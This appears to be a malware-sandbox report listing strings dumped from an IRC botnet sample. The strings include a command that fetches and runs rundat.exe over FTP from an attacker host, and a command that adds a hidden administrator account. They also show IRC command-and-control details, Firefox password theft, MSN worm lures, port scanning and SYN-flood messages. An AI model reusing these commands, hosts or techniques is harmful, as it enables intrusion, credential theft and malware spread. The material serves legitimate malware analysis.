www.level3.com

nitro.ucsc.edu

www.burst.net

www.cogentco.com

www.rit.edu

www.nocster.com

www.verio.com

www.stanford.edu

www.xo.net

www.google.it

de.yahoo.com

www.belwue.de

www.switch.ch

www.1und1.de

verio.fr

www.utwente.nl

www.schlund.net

%s No %s thread found.

%s %s %s stopped. (%d thread(s) stopped.)

mscoree.dll

- This application cannot run using the active version of the Microsoft .NET Runtime

Please contact the application's support team for more information.

internal state. The program cannot safely continue execution and must

continue execution and must now be terminated.

GetProcessWindowStation

PeekNamedPipe

CreatePipe

KERNEL32.dll

USER32.dll

WS2_32.dll

VERSION.dll

GetCPInfo

Gt8%S

iexplorer.exe

sysconfig.dat

Software\\Microsoft\\Windows\\CurrentVersion\\Run

Software\\Microsoft\\Windows\\CurrentVersion\\RunServices

frozynv.ODIN2-VALHALL.COM

ntpass

NTPass

sql-1433

;3 #>6.&

'2, / 0&7!4-)1#

tftp.exe -i get

:.login

:!login

:.ident

:.hashin

:.secure

:.auth

login

.download

.update

getcftp

JOIN #

NICK

now an IRC Operator

paypal.com

PAYPAL.COM

e-gold.com

e-gold.co.uk

zcÁ

.9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, Request: iexplorer.exe.

[FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.

IP: 174.232.132.21:5900, Scan thread: 1, Sub-thread: 1.

IP: 174.192.67.197:5900, Scan thread: 1, Sub-thread: 2.

IP: 174.17.113.165:5900, Scan thread: 1, Sub-thread: 3.

IP: 174.47.218.244:5900, Scan thread: 1, Sub-thread: 4.

IP: 174.183.168.229:5900, Scan thread: 1, Sub-thread: 5.

IP: 174.129.103.49:5900, Scan thread: 1, Sub-thread: 6.

IP: 174.10.3.9:5900, Scan thread: 1, Sub-thread: 7.

IP: 174.142.86.244:5900, Scan thread: 1, Sub-thread: 8.

IP: 174.155.59.118:5900, Scan thread: 1, Sub-thread: 9.

IP: 174.218.161.46:5900, Scan thread: 1, Sub-thread: 10.

IP: 174.186.16.248:5900, Scan thread: 1, Sub-thread: 11.

IP: 174.2.190.18:5900, Scan thread: 1, Sub-thread: 12.

IP: 174.176.117.60:5900, Scan thread: 1, Sub-thread: 13.

IP: 174.235.21.94:5900, Scan thread: 1, Sub-thread: 14.

IP: 174.160.19.143:5900, Scan thread: 1, Sub-thread: 15.

IP: 174.123.64.19:5900, Scan thread: 1, Sub-thread: 16.

IP: 174.232.103.144:5900, Scan thread: 1, Sub-thread: 17.

IP: 174.120.81.194:5900, Scan thread: 1, Sub-thread: 18.

IP: 174.230.145.11:5900, Scan thread: 1, Sub-thread: 19.

IP: 174.185.47.196:5900, Scan thread: 1, Sub-thread: 20.

IP: 174.26.195.76:5900, Scan thread: 1, Sub-thread: 21.

IP: 174.113.201.228:5900, Scan thread: 1, Sub-thread: 22.

IP: 174.161.240.130:5900, Scan thread: 1, Sub-thread: 23.

IP: 174.68.162.196:5900, Scan thread: 1, Sub-thread: 24.

IP: 174.240.21.27:5900, Scan thread: 1, Sub-thread: 25.

IP: 174.78.240.230:5900, Scan thread: 1, Sub-thread: 26.

IP: 174.221.51.84:5900, Scan thread: 1, Sub-thread: 27.

IP: 174.172.49.199:5900, Scan thread: 1, Sub-thread: 28.

IP: 174.80.79.203:5900, Scan thread: 1, Sub-thread: 29.

IP: 174.41.2.54:5900, Scan thread: 1, Sub-thread: 30.

IP: 174.56.21.84:5900, Scan thread: 1, Sub-thread: 31.

IP: 174.20.215.201:5900, Scan thread: 1, Sub-thread: 32.

IP: 174.151.152.169:5900, Scan thread: 1, Sub-thread: 33.

IP: 174.190.244.114:5900, Scan thread: 1, Sub-thread: 34.

IP: 174.113.51.166:5900, Scan thread: 1, Sub-thread: 35.

IP: 174.207.104.3:5900, Scan thread: 1, Sub-thread: 36.

IP: 174.22.77.143:5900, Scan thread: 1, Sub-thread: 37.

IP: 174.255.156.151:5900, Scan thread: 1, Sub-thread: 38.

IP: 174.6.52.9:5900, Scan thread: 1, Sub-thread: 39.

IP: 174.91.208.247:5900, Scan thread: 1, Sub-thread: 40.

IP: 174.209.73.225:5900, Scan thread: 1, Sub-thread: 41.

IP: 174.88.29.10:5900, Scan thread: 1, Sub-thread: 42.

IP: 174.203.109.146:5900, Scan thread: 1, Sub-thread: 43.

IP: 174.141.108.194:5900, Scan thread: 1, Sub-thread: 44.

IP: 174.245.230.10:5900, Scan thread: 1, Sub-thread: 45.

IP: 174.118.146.145:5900, Scan thread: 1, Sub-thread: 46.

IP: 174.81.255.188:5900, Scan thread: 1, Sub-thread: 47.

IP: 174.56.85.253:5900, Scan thread: 1, Sub-thread: 48.

IP: 174.155.132.119:5900, Scan thread: 1, Sub-thread: 49.

IP: 174.14.69.176:5900, Scan thread: 1, Sub-thread: 50.

IP: 174.177.121.98:5900, Scan thread: 1, Sub-thread: 51.

IP: 174.153.155.251:5900, Scan thread: 1, Sub-thread: 52.

IP: 174.115.229.98:5900, Scan thread: 1, Sub-thread: 53.

IP: 174.60.150.120:5900, Scan thread: 1, Sub-thread: 54.

IP: 174.1.252.92:5900, Scan thread: 1, Sub-thread: 55.

IP: 174.125.33.167:5900, Scan thread: 1, Sub-thread: 56.

IP: 174.131.213.143:5900, Scan thread: 1, Sub-thread: 57.

IP: 174.177.182.162:5900, Scan thread: 1, Sub-thread: 58.

IP: 174.234.58.135:5900, Scan thread: 1, Sub-thread: 59.

IP: 174.119.118.141:5900, Scan thread: 1, Sub-thread: 60.

IP: 174.121.252.116:5900, Scan thread: 1, Sub-thread: 61.

IP: 174.33.193.116:5900, Scan thread: 1, Sub-thread: 62.

IP: 174.171.4.233:5900, Scan thread: 1, Sub-thread: 63.

IP: 174.193.253.142:5900, Scan thread: 1, Sub-thread: 64.

IP: 174.220.36.228:5900, Scan thread: 1, Sub-thread: 65.

IP: 174.243.166.196:5900, Scan thread: 1, Sub-thread: 66.

IP: 174.142.254.193:5900, Scan thread: 1, Sub-thread: 67.

IP: 174.177.245.125:5900, Scan thread: 1, Sub-thread: 68.

IP: 174.2.176.240:5900, Scan thread: 1, Sub-thread: 69.

IP: 174.236.13.135:5900, Scan thread: 1, Sub-thread: 70.

IP: 174.249.151.8:5900, Scan thread: 1, Sub-thread: 71.

IP: 174.179.207.158:5900, Scan thread: 1, Sub-thread: 72.

IP: 174.155.244.207:5900, Scan thread: 1, Sub-thread: 73.

IP: 174.222.117.213:5900, Scan thread: 1, Sub-thread: 74.

IP: 174.138.75.65:5900, Scan thread: 1, Sub-thread: 75.

IP: 174.214.79.105:5900, Scan thread: 1, Sub-thread: 76.

IP: 174.240.14.140:5900, Scan thread: 1, Sub-thread: 77.

IP: 174.192.215.37:5900, Scan thread: 1, Sub-thread: 78.

IP: 174.67.53.231:5900, Scan thread: 1, Sub-thread: 79.

IP: 174.202.144.236:5900, Scan thread: 1, Sub-thread: 80.

IP: 174.129.120.214:5900, Scan thread: 1, Sub-thread: 81.

IP: 174.2.247.219:5900, Scan thread: 1, Sub-thread: 82.

IP: 174.100.22.211:5900, Scan thread: 1, Sub-thread: 83.

IP: 174.179.61.214:5900, Scan thread: 1, Sub-thread: 84.

IP: 174.32.39.235:5900, Scan thread: 1, Sub-thread: 85.

IP: 174.209.176.168:5900, Scan thread: 1, Sub-thread: 86.

IP: 174.133.17.234:5900, Scan thread: 1, Sub-thread: 87.

IP: 174.43.74.109:5900, Scan thread: 1, Sub-thread: 88.

IP: 174.87.65.63:5900, Scan thread: 1, Sub-thread: 89.

IP: 174.152.34.126:5900, Scan thread: 1, Sub-thread: 90.

IP: 174.246.18.227:5900, Scan thread: 1, Sub-thread: 91.

IP: 174.152.5.160:5900, Scan thread: 1, Sub-thread: 92.

IP: 174.178.255.210:5900, Scan thread: 1, Sub-thread: 93.

IP: 174.39.243.213:5900, Scan thread: 1, Sub-thread: 94.

IP: 174.91.234.229:5900, Scan thread: 1, Sub-thread: 95.

IP: 174.175.120.3:5900, Scan thread: 1, Sub-thread: 96.

IP: 174.130.249.102:5900, Scan thread: 1, Sub-thread: 97.

IP: 174.241.233.228:5900, Scan thread: 1, Sub-thread: 98.

IP: 174.94.249.242:5900, Scan thread: 1, Sub-thread: 99.

IP: 174.140.245.149:5900, Scan thread: 1, Sub-thread: 100.

IP: 174.72.123.213:5900, Scan thread: 1, Sub-thread: 101.

IP: 174.30.33.213:5900, Scan thread: 1, Sub-thread: 102.

IP: 174.135.26.105:5900, Scan thread: 1, Sub-thread: 103.

IP: 174.100.237.108:5900, Scan thread: 1, Sub-thread: 104.

IP: 174.103.182.177:5900, Scan thread: 1, Sub-thread: 105.

IP: 174.108.75.215:5900, Scan thread: 1, Sub-thread: 106.

IP: 174.42.149.25:5900, Scan thread: 1, Sub-thread: 107.

IP: 174.124.0.165:5900, Scan thread: 1, Sub-thread: 108.

IP: 174.214.40.212:5900, Scan thread: 1, Sub-thread: 109.

IP: 174.230.5.182:5900, Scan thread: 1, Sub-thread: 110.

IP: 174.111.55.103:5900, Scan thread: 1, Sub-thread: 111.

IP: 174.11.251.175:5900, Scan thread: 1, Sub-thread: 112.

IP: 174.211.198.6:5900, Scan thread: 1, Sub-thread: 113.

IP: 174.107.203.121:5900, Scan thread: 1, Sub-thread: 114.

IP: 174.119.119.136:5900, Scan thread: 1, Sub-thread: 115.

IP: 174.93.94.90:5900, Scan thread: 1, Sub-thread: 116.

IP: 174.125.242.8:5900, Scan thread: 1, Sub-thread: 117.

IP: 174.158.62.34:5900, Scan thread: 1, Sub-thread: 118.

IP: 174.153.239.170:5900, Scan thread: 1, Sub-thread: 119.

IP: 174.5.186.1:5900, Scan thread: 1, Sub-thread: 120.

IP: 174.212.220.116:5900, Scan thread: 1, Sub-thread: 121.

IP: 174.213.166.101:5900, Scan thread: 1, Sub-thread: 122.

IP: 174.26.237.47:5900, Scan thread: 1, Sub-thread: 123.

IP: 174.12.231.242:5900, Scan thread: 1, Sub-thread: 124.

IP: 174.179.119.98:5900, Scan thread: 1, Sub-thread: 125.

IP: 174.211.225.95:5900, Scan thread: 1, Sub-thread: 126.

IP: 174.64.217.110:5900, Scan thread: 1, Sub-thread: 127.

IP: 174.184.103.41:5900, Scan thread: 1, Sub-thread: 128.

IP: 174.13.172.64:5900, Scan thread: 1, Sub-thread: 129.

IP: 174.203.22.69:5900, Scan thread: 1, Sub-thread: 130.

IP: 174.19.232.180:5900, Scan thread: 1, Sub-thread: 131.

IP: 174.28.239.184:5900, Scan thread: 1, Sub-thread: 132.

IP: 174.251.205.71:5900, Scan thread: 1, Sub-thread: 133.

IP: 174.107.192.248:5900, Scan thread: 1, Sub-thread: 134.

IP: 174.169.41.73:5900, Scan thread: 1, Sub-thread: 135.

IP: 174.69.231.137:5900, Scan thread: 1, Sub-thread: 136.

IP: 174.165.66.183:5900, Scan thread: 1, Sub-thread: 137.

IP: 174.229.164.119:5900, Scan thread: 1, Sub-thread: 138.

IP: 174.229.24.200:5900, Scan thread: 1, Sub-thread: 139.

IP: 174.20.15.247:5900, Scan thread: 1, Sub-thread: 140.

IP: 174.224.224.66:5900, Scan thread: 1, Sub-thread: 141.

IP: 174.255.99.198:5900, Scan thread: 1, Sub-thread: 142.

IP: 174.205.41.48:5900, Scan thread: 1, Sub-thread: 143.

IP: 174.209.74.121:5900, Scan thread: 1, Sub-thread: 144.

IP: 174.199.246.213:5900, Scan thread: 1, Sub-thread: 145.

IP: 174.98.59.128:5900, Scan thread: 1, Sub-thread: 146.

IP: 174.34.238.62:5900, Scan thread: 1, Sub-thread: 147.

IP: 174.240.58.51:5900, Scan thread: 1, Sub-thread: 148.

IP: 174.99.20.131:5900, Scan thread: 1, Sub-thread: 149.

IP: 174.34.130.179:5900, Scan thread: 1, Sub-thread: 150.

IP: 174.178.211.78:5900, Scan thread: 1, Sub-thread: 151.

IP: 174.199.155.221:5900, Scan thread: 1, Sub-thread: 152.

IP: 174.13.60.103:5900, Scan thread: 1, Sub-thread: 153.

IP: 174.80.227.174:5900, Scan thread: 1, Sub-thread: 154.

IP: 174.138.45.250:5900, Scan thread: 1, Sub-thread: 155.

IP: 174.159.42.130:5900, Scan thread: 1, Sub-thread: 156.

IP: 174.52.202.219:5900, Scan thread: 1, Sub-thread: 157.

IP: 174.189.167.33:5900, Scan thread: 1, Sub-thread: 158.

IP: 174.84.9.193:5900, Scan thread: 1, Sub-thread: 159.

IP: 174.104.179.124:5900, Scan thread: 1, Sub-thread: 160.

IP: 174.81.130.151:5900, Scan thread: 1, Sub-thread: 161.

IP: 174.178.29.227:5900, Scan thread: 1, Sub-thread: 162.

IP: 174.89.243.205:5900, Scan thread: 1, Sub-thread: 163.

IP: 174.29.23.190:5900, Scan thread: 1, Sub-thread: 164.

IP: 174.86.213.87:5900, Scan thread: 1, Sub-thread: 165.

IP: 174.45.46.5:5900, Scan thread: 1, Sub-thread: 166.

IP: 174.209.209.24:5900, Scan thread: 1, Sub-thread: 167.

IP: 174.184.49.216:5900, Scan thread: 1, Sub-thread: 168.

IP: 174.133.8.100:5900, Scan thread: 1, Sub-thread: 169.

IP: 174.29.24.77:5900, Scan thread: 1, Sub-thread: 170.

IP: 174.50.4.154:5900, Scan thread: 1, Sub-thread: 171.

IP: 174.198.126.103:5900, Scan thread: 1, Sub-thread: 172.

IP: 174.248.125.54:5900, Scan thread: 1, Sub-thread: 173.

IP: 174.162.181.229:5900, Scan thread: 1, Sub-thread: 174.

IP: 174.84.213.71:5900, Scan thread: 1, Sub-thread: 175.

IP: 174.80.191.235:5900, Scan thread: 1, Sub-thread: 176.

IP: 174.80.114.244:5900, Scan thread: 1, Sub-thread: 177.

IP: 174.34.197.191:5900, Scan thread: 1, Sub-thread: 178.

IP: 174.153.180.14:5900, Scan thread: 1, Sub-thread: 179.

IP: 174.37.154.127:5900, Scan thread: 1, Sub-thread: 180.

IP: 174.230.62.26:5900, Scan thread: 1, Sub-thread: 181.

IP: 174.12.155.154:5900, Scan thread: 1, Sub-thread: 182.

IP: 174.48.165.189:5900, Scan thread: 1, Sub-thread: 183.

IP: 174.57.21.18:5900, Scan thread: 1, Sub-thread: 184.

IP: 174.188.0.195:5900, Scan thread: 1, Sub-thread: 185.

IP: 174.185.166.204:5900, Scan thread: 1, Sub-thread: 186.

IP: 174.39.203.34:5900, Scan thread: 1, Sub-thread: 187.

IP: 174.140.176.118:5900, Scan thread: 1, Sub-thread: 188.

IP: 174.3.241.182:5900, Scan thread: 1, Sub-thread: 189.

IP: 174.22.185.205:5900, Scan thread: 1, Sub-thread: 190.

IP: 174.231.109.194:5900, Scan thread: 1, Sub-thread: 191.

IP: 174.25.13.209:5900, Scan thread: 1, Sub-thread: 192.

IP: 174.151.35.149:5900, Scan thread: 1, Sub-thread: 193.

IP: 174.85.170.219:5900, Scan thread: 1, Sub-thread: 194.

IP: 174.178.22.251:5900, Scan thread: 1, Sub-thread: 195.

IP: 174.132.137.37:5900, Scan thread: 1, Sub-thread: 196.

IP: 174.127.156.6:5900, Scan thread: 1, Sub-thread: 197.

IP: 174.168.67.146:5900, Scan thread: 1, Sub-thread: 198.

IP: 174.11.174.18:5900, Scan thread: 1, Sub-thread: 199.

IP: 174.209.151.151:5900, Scan thread: 1, Sub-thread: 200.

[07-30-2014 01:51:04] [FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.

exe, Re[07-30-2014 01:51:04] .9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, R

[07-30-2014 01:51:04] Joined channel: ##!v!##

[07-30-2014 01:51:03] Connected to frozynv.ODIN2-VALHALL.COM

%System%\iexplorer.exe

csrss.exe_492:

.text

`.rdata

@.data

.rsrc

t1SSSSh

SSSh8

PSShB

msn.msg

msn.stop

login

firefox

join

USERENV.dll

VkKeyScanA

keybd_event

USER32.dll

ole32.dll

OLEAUT32.dll

TransactNamedPipe

GetWindowsDirectoryA

KERNEL32.dll

MSVCRT.dll

_acmdln

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

ADVAPI32.dll

WS2_32.dll

ntpass

Exploit FTPD: %d, Total: %d.

%s: %d,

%s Exploit Statistics:

cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i

%s.%s.%s.%s

%s Scan not active.

%s Current IP: %s.

%s Server started, Port: %i, File: %s.

%d.%d.%d.%d

%s Finished at %s:%d after %d minute(s) of scanning.

%s %s:%d, Scan thread: %d, Sub-thread: %d.

%s Failed to initialize critical section, error: <%d>

%s Portscan: %s:%d open.

Failed auth by %s(%s@%s)

Whats up %s? Im ready to rock!

Spy: %s!%s@%s (PM: "%s")

Fail by: %s!%s@%s (Pass Tried: %s)

%s out.

%s already running: <%d>.

Failed to start thread %s, error: <%d>.

[Current task] %s [System uptime] %s [Bot Uptime] %s

Bot installed on: %s.

Go fuck yourself %s.

MSN// Message & Zipfile sent to: %d contacts.

Hey got new sex Pics from me %d. realy Sexy!

MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.

Removed by: %s!%s@%s

Advapi.dll Failed

PStore.dll Failed.

%s Failed to parse command.

%s Failed to start scan thread, error: <%d>.

%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.

%s No subnet class specified, try "-a" or "-b" or "-c"

%s Could not parse external IP.

%s Trying to get external IP.

%s Failed to start scan, no IP specified.

%d.x.x.x

%s Failed to start scan, port is invalid.

%s Already scanning with %d threads. Too many specified.

Updating from %s (%s)

%stempfile%d%d%d%d%d.exe

ftp://%s:%s@%s:%s/%s path: %s

sftp

net localgroup Administrateurs ASP.NET /add

net localgroup Administradors ASP.NET /add

net localgroup Administratoren ASP.NET /add

net localgroup Administrator ASP.NET /add

net localgroup Administrators ASP.NET /add

net user ASP.NET hardcore /add

SYN: Failed to start thread,error: (%d).

SYN: --> (%s:%s) for (%s secs).

FUCKING: --> (%s:%s) for (%s secs).

Downloading %s and saving it to: %s.

Failed to start socks4 daemon (%s)

Socks(4) server started on %s:%i

Starting firefox pstore

FIREFOX Threads

Process Finished: "%s", Total Running Time: %s.

File executed: %s

Unable to create process: "%s"

%s Couldn't parse path, error: <%d>

%.1fkb downloaded to %s (%.1fkbps)

Couldn't open file for writing: %s.

Windows for Workgroups 3.1a

WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195

Windows 2000 5.0

Windows 2000 2195

PK11_CheckUserPassword

PK11_GetInternalKeySlot

softokn3.dll

sqlite3.dll

nssutil3.dll

plds4.dll

nspr4.dll

mozcrt19.dll

nss3.dll

plc4.dll

%s %s:%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

\profiles.ini

Application Data\Mozilla\Firefox

signons3.txt

signons2.txt

signons1.txt

pipe\epmapper

\\%s\

Windows 5.1

Windows 5.0

Windows 2000 LAN Manager*

NT LAN Manager *.*

Windows Server 2003 *.*

%s File transfer complete to IP: %s.

%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.

%s Started send to IP: %s.

200 PORT command successful.

PORT

%s %s LIST request from: %s

425 Passive not supported on this server

215 StnyFtpd

331 Password required

%s %s

%s Couldn't open data connection to: %s:%i, error: <%d>.

Ping Timeout? (%d-%d)%d/%d

Login list completed!

<%i> %s!%s@%s

Logins:

USER TbT * 0 :%s

NICK %s

{%s-%s-%s-%s-%s}

{iNF-%s-%s-%s-%s-%s}

nigzss.txt

TskMultiChatForm.UnicodeClass

__oxFrame.class__

PASS %s

QUIT %s

PONG %s

NICK

PRIVMSG

JOIN

NOTICE %s :%s

PRIVMSG %s :%s

JOIN %s

JOIN %s %s

PART %s

[%s|%s]

shlwapi.dll

pstorec.dll

psapi.dll

userenv.dll

SQLDisconnect

SQLFreeHandle

SQLAllocHandle

SQLExecDirect

SQLSetEnvAttr

SQLDriverConnect

odbc32.dll

ShellExecuteA

shell32.dll

mpr.dll

GetUdpTable

GetTcpTable

iphlpapi.dll

dnsapi.dll

netapi32.dll

Mozilla/4.0 (compatible)

InternetCrackUrlA

InternetOpenUrlA

FtpPutFileA

FtpGetFileA

HttpSendRequestA

HttpOpenRequestA

wininet.dll

ws2_32.dll

RegEnumKeyExA

advapi32.dll

user32.dll

kernel32.dll

%s!%s@%s

NICK {%s-%s-%s-%s-%s}

https:/

http:/

csrss.exe

*!*@fbi.edu

||FTP||

jayne.p0rn-lover.us

rundat.exe

vids.p0rn-lover.us

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

%s\%s

%s Done @ (%iKB Sec)

No %s thread found.

%s thread stopped.

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

\Desktop.ini

\autorun.inf

icon=%SystemRoot%\system32\SHELL32.dll,4

http://www.whatismyip.com

http://checkip.dyndns.org

del "%s">nul

if exist "%s" goto Repeat

ping 0.0.0.0>nul

%s\removeMe%i%i%i%i.bat

%s%%s

%d day%s (%0.2d hours & %0.2d mins)

%WinDir%\csrss.exe

193.138.244.231

192.168.48.133

231-ua-upclick.ipsystems.com.ua

||SCAN|| Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 50 threads.

||FTP|| Server started, Port: 8989, File: %WinDir%\csrss.exe.

csrss.exe_492_rwx_00400000_0005A000:

.text

`.rdata

@.data

.rsrc

t1SSSSh

SSSh8

PSShB

msn.msg

msn.stop

login

firefox

join

USERENV.dll

VkKeyScanA

keybd_event

USER32.dll

ole32.dll

OLEAUT32.dll

TransactNamedPipe

GetWindowsDirectoryA

KERNEL32.dll

MSVCRT.dll

_acmdln

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

ADVAPI32.dll

WS2_32.dll

ntpass

Exploit FTPD: %d, Total: %d.

%s: %d,

%s Exploit Statistics:

cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i

%s.%s.%s.%s

%s Scan not active.

%s Current IP: %s.

%s Server started, Port: %i, File: %s.

%d.%d.%d.%d

%s Finished at %s:%d after %d minute(s) of scanning.

%s %s:%d, Scan thread: %d, Sub-thread: %d.

%s Failed to initialize critical section, error: <%d>

%s Portscan: %s:%d open.

Failed auth by %s(%s@%s)

Whats up %s? Im ready to rock!

Spy: %s!%s@%s (PM: "%s")

Fail by: %s!%s@%s (Pass Tried: %s)

%s out.

%s already running: <%d>.

Failed to start thread %s, error: <%d>.

[Current task] %s [System uptime] %s [Bot Uptime] %s

Bot installed on: %s.

Go fuck yourself %s.

MSN// Message & Zipfile sent to: %d contacts.

Hey got new sex Pics from me %d. realy Sexy!

MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.

Removed by: %s!%s@%s

Advapi.dll Failed

PStore.dll Failed.

%s Failed to parse command.

%s Failed to start scan thread, error: <%d>.

%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.

%s No subnet class specified, try "-a" or "-b" or "-c"

%s Could not parse external IP.

%s Trying to get external IP.

%s Failed to start scan, no IP specified.

%d.x.x.x

%s Failed to start scan, port is invalid.

%s Already scanning with %d threads. Too many specified.

Updating from %s (%s)

%stempfile%d%d%d%d%d.exe

ftp://%s:%s@%s:%s/%s path: %s

sftp

net localgroup Administrateurs ASP.NET /add

net localgroup Administradors ASP.NET /add

net localgroup Administratoren ASP.NET /add

net localgroup Administrator ASP.NET /add

net localgroup Administrators ASP.NET /add

net user ASP.NET hardcore /add

SYN: Failed to start thread,error: (%d).

SYN: --> (%s:%s) for (%s secs).

FUCKING: --> (%s:%s) for (%s secs).

Downloading %s and saving it to: %s.

Failed to start socks4 daemon (%s)

Socks(4) server started on %s:%i

Starting firefox pstore

FIREFOX Threads

Process Finished: "%s", Total Running Time: %s.

File executed: %s

Unable to create process: "%s"

%s Couldn't parse path, error: <%d>

%.1fkb downloaded to %s (%.1fkbps)

Couldn't open file for writing: %s.

Windows for Workgroups 3.1a

WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195

Windows 2000 5.0

Windows 2000 2195

PK11_CheckUserPassword

PK11_GetInternalKeySlot

softokn3.dll

sqlite3.dll

nssutil3.dll

plds4.dll

nspr4.dll

mozcrt19.dll

nss3.dll

plc4.dll

%s %s:%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

\profiles.ini

Application Data\Mozilla\Firefox

signons3.txt

signons2.txt

signons1.txt

pipe\epmapper

\\%s\

Windows 5.1

Windows 5.0

Windows 2000 LAN Manager*

NT LAN Manager *.*

Windows Server 2003 *.*

%s File transfer complete to IP: %s.

%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.

%s Started send to IP: %s.

200 PORT command successful.

PORT

%s %s LIST request from: %s

425 Passive not supported on this server

215 StnyFtpd

331 Password required

%s %s

%s Couldn't open data connection to: %s:%i, error: <%d>.

Ping Timeout? (%d-%d)%d/%d

Login list completed!

<%i> %s!%s@%s

Logins:

USER TbT * 0 :%s

NICK %s

{%s-%s-%s-%s-%s}

{iNF-%s-%s-%s-%s-%s}

nigzss.txt

TskMultiChatForm.UnicodeClass

__oxFrame.class__

PASS %s

QUIT %s

PONG %s

NICK

PRIVMSG

JOIN

NOTICE %s :%s

PRIVMSG %s :%s

JOIN %s

JOIN %s %s

PART %s

[%s|%s]

shlwapi.dll

pstorec.dll

psapi.dll

userenv.dll

SQLDisconnect

SQLFreeHandle

SQLAllocHandle

SQLExecDirect

SQLSetEnvAttr

SQLDriverConnect

odbc32.dll

ShellExecuteA

shell32.dll

mpr.dll

GetUdpTable

GetTcpTable

iphlpapi.dll

dnsapi.dll

netapi32.dll

Mozilla/4.0 (compatible)

InternetCrackUrlA

InternetOpenUrlA

FtpPutFileA

FtpGetFileA

HttpSendRequestA

HttpOpenRequestA

wininet.dll

ws2_32.dll

RegEnumKeyExA

advapi32.dll

user32.dll

kernel32.dll

%s!%s@%s

NICK {%s-%s-%s-%s-%s}

https:/

http:/

csrss.exe

*!*@fbi.edu

||FTP||

jayne.p0rn-lover.us

rundat.exe

vids.p0rn-lover.us

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

%s\%s

%s Done @ (%iKB Sec)

No %s thread found.

%s thread stopped.

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

\Desktop.ini

\autorun.inf

icon=%SystemRoot%\system32\SHELL32.dll,4

http://www.whatismyip.com

http://checkip.dyndns.org

del "%s">nul

if exist "%s" goto Repeat

ping 0.0.0.0>nul

%s\removeMe%i%i%i%i.bat

%s%%s

%d day%s (%0.2d hours & %0.2d mins)

%WinDir%\csrss.exe

193.138.244.231

192.168.48.133

231-ua-upclick.ipsystems.com.ua

||SCAN|| Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 50 threads.

||FTP|| Server started, Port: 8989, File: %WinDir%\csrss.exe.

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps